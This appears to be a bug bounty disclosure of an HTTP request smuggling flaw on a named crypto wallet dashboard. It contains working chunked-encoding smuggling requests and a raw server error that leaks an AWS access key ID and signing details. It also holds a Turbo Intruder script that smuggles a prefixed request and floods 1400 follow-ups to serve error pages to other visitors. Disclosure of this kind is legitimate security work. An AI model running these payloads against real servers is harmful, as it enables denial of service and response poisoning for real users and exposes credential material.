HTTP SMUGGLING EXPOSED HMAC/DOS

HTTP SMUGGLING EXPOSED HMAC / DOS Using the transfer-encoding header and following it with a zero. The back end leaked the hmac the back end reflected back the hmac key encryption type, and a lot of details. Further testing had it reflect more headers. [http-smuggling-dashboard-fortmatic.png] we will notice i was able to cause the next valid request to error out returning valuable details. Next picture will show the response being reflected back this is important, i will be devoting time on exploiting this further. Proof of Concept `[space]Transfer-Encoding: chunked` ``` GET /login HTTP/1.1 Host: dashboard.fortmatic.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://dashboard.fortmatic.com/ DNT: 1 Connection: keep-alive Cookie: ajs_user_id=null; ajs_group_id=null; ajs_anonymous_id=%2217057bde-1957-4ee5-ab69-48f049e806f1%22 Upgrade-Insecure-Requests: 1 If-Modified-Since: Sat, 07 Dec 2019 02:01:47 GMT Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 5 Transfer-Encoding: chunked 0 ``` Response ``` HTTP/1.1 403 Forbidden Content-Type: application/xml Transfer-Encoding: chunked Connection: close Date: Sun, 08 Dec 2019 11:00:51 GMT Server: AmazonS3 Strict-Transport-Security: max-age=63072000; includeSubdomains; preload Content-Security-Policy: default-src 'self';style-src 'self' 'unsafe-inline'; frame-src https://*.fortmatic.com/ https://fortmatic.github.io/ blob: https://x2.fortmatic.com; img-src 'self' https://*.fortmatic.com/ https://fortmatic.github.io/ https://anima-uploads.s3.amazonaws.com/ https://www.google-analytics.com/ https://stats.g.doubleclick.net/ https://*.githubusercontent.com https://www.google.com/ data:; connect-src 'self' https://*.fortmatic.com/ https://api.segment.io/ https://api.mixpanel.com/ https://api.amplitude.com/; script-src 'self' https://cdn.segment.com/ https://cdn.mxpnl.com/libs/mixpanel-2-latest.min.js https://www.google-analytics.com/analytics.js https://cdn.amplitude.com/; base-uri 'self'; X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Referrer-Policy: strict-origin-when-cross-origin X-Cache: Error from cloudfront Via: 1.1 e2deefdf2f2c76b24ee4785b69116006.cloudfront.net (CloudFront) X-Amz-Cf-Pop: ATL56-C3 X-Amz-Cf-Id: znmHV1cu6phenKt25Mwr0WtHOgrpgrR4FvReDNGyaA2t__4ZCGRdmA== <?xml version="1.0" encoding="UTF-8"?> <Error><Code>SignatureDoesNotMatch</Code><Message>The request signature we calculated does not match the signature you provided. Check your key and signing method.</Message><AWSAccessKeyId>AKIAIJKUV7PUHL53M2YQ</AWSAccessKeyId><StringToSign>AWS4-HMAC-SHA256 20191208T110051Z 20191208/us-west-2/s3/aws4_request 7f35f27b1337db0e03780f8a4e47f011a5ae6fa11d0d62f36a953cf9b2021fc1</StringToSign><SignatureProvided>a39151b144736e9967f33fcc5c4e6d5d6221975273efc1bda31661d92ade8658</SignatureProvided><StringToSignBytes>41 57 53 34 2d 48 4d 41 43 2d 53 48 41 32 35 36 0a 32 30 31 39 31 32 30 38 54 31 31 30 30 35 31 5a 0a 32 30 31 39 31 32 30 38 2f 75 73 2d 77 65 73 74 2d 32 2f 73 33 2f 61 77 73 34 5f 72 65 71 75 65 73 74 0a 37 66 33 35 66 32 37 62 31 33 33 37 64 62 30 65 30 33 37 38 30 66 38 61 34 65 34 37 66 30 31 31 61 35 61 65 36 66 61 31 31 64 30 64 36 32 66 33 36 61 39 35 33 63 66 39 62 32 30 32 31 66 63 31</StringToSignBytes><CanonicalRequest>GET /index.html content-type:application/x-www-form-urlencoded Transfer-Encoding: chunked host:dashboard.fortmatic.com.s3.amazonaws.com x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20191208T110051Z content-type;host;x-amz-content-sha256;x-amz-date e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855</CanonicalRequest><CanonicalRequestBytes>47 45 54 0a 2f 69 6e 64 65 78 2e 68 74 6d 6c 0a 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 20 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0a 68 6f 73 74 3a 64 61 73 68 62 6f 61 72 64 2e 66 6f 72 74 6d 61 74 69 63 2e 63 6f 6d 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 0a 78 2d 61 6d 7a 2d 63 6f 6e 74 65 6e 74 2d 73 68 61 32 35 36 3a 65 33 62 30 63 34 34 32 39 38 66 63 31 63 31 34 39 61 66 62 66 34 63 38 39 39 36 66 62 39 32 34 32 37 61 65 34 31 65 34 36 34 39 62 39 33 34 63 61 34 39 35 39 39 31 62 37 38 35 32 62 38 35 35 0a 78 2d 61 6d 7a 2d 64 61 74 65 3a 32 30 31 39 31 32 30 38 54 31 31 30 30 35 31 5a 0a 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3b 68 6f 73 74 3b 78 2d 61 6d 7a 2d 63 6f 6e 74 65 6e 74 2d 73 68 61 32 35 36 3b 78 2d 61 6d 7a 2d 64 61 74 65 0a 65 33 62 30 63 34 34 32 39 38 66 63 31 63 31 34 39 61 66 62 66 34 63 38 39 39 36 66 62 39 32 34 32 37 61 65 34 31 65 34 36 34 39 62 39 33 34 63 61 34 39 35 39 39 31 62 37 38 35 32 62 38 35 35</CanonicalRequestBytes><RequestId>D6ACD16A4B4F1851</RequestId><HostId>R+VilJrBSB5s4ILN8GAc98W5eIh6vZguZp+RPJBg/1QimzpFTvwgbtC/BYiNNmx6m8USBuzLndo=</HostId></Error> ``` Now lets change it up and try to cause cache poisoning and move it to desync attack. The headers don't change much but this will cause the next valid request to be served with the error page. Load the request into turbo intruder to make finding it easier. This will in affect server users with my error page causing DOS. Notice in http-smuggling-dashboard-fortmatic2.png that the 200 status code are reflected back when you load the page. this is because when the error page happens it reflects a valid response to me. Turbo: ``` # if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time import re def queueRequests(target, wordlists): # to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=5, requestsPerConnection=1, resumeSSL=False, timeout=10, pipeline=False, maxRetriesPerRequest=0, engine=Engine.THREADED, ) engine.start() # This will prefix the victim's request. Edit it to achieve the desired effect. prefix = '''GET / HTTP/1.1 Host: x2.fortmatic.com Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1''' chunk_size = hex(len(prefix)).lstrip("0x") attack = target.req.replace('0\r\n\r\n', chunk_size+'\r\n'+prefix+'\r\n0\r\n\r\n') content_length = re.search('Content-Length: ([\d]+)', attack).group(1) attack = attack.replace('Content-Length: '+content_length, 'Content-length: '+str(int(content_length)+len(chunk_size)-3)) engine.queue(attack) for i in range(1400): engine.queue(target.req) time.sleep(0.05) def handleResponse(req, interesting): table.add(req) ``` Request ``` GET /login HTTP/1.1 Host: dashboard.fortmatic.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://dashboard.fortmatic.com/ DNT: 1 Connection: keep-alive Cookie: ajs_user_id=null; ajs_group_id=null; ajs_anonymous_id=%2217057bde-1957-4ee5-ab69-48f049e806f1%22 Upgrade-Insecure-Requests: 1 If-Modified-Since: Sat, 07 Dec 2019 02:01:47 GMT Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 72 GET / HTTP/1.1 Host: x2.fortmatic.com Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0 ``` Impact: The miss configuration with the back end cause it to reflect back the error page when the next valid request comes through. This will lead to a DOS serve this error page when visitor view the website. I will work on exploiting this more Resources: https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn https://portswigger.net/web-security/request-smuggling https://portswigger.net/research/practical-web-cache-poisoning ## Impact Impact: The miss configuration with the back end cause it to reflect back the error page when the next valid request comes through. This will lead to a DOS serve this error page when visitor view the website. I will work on exploiting this more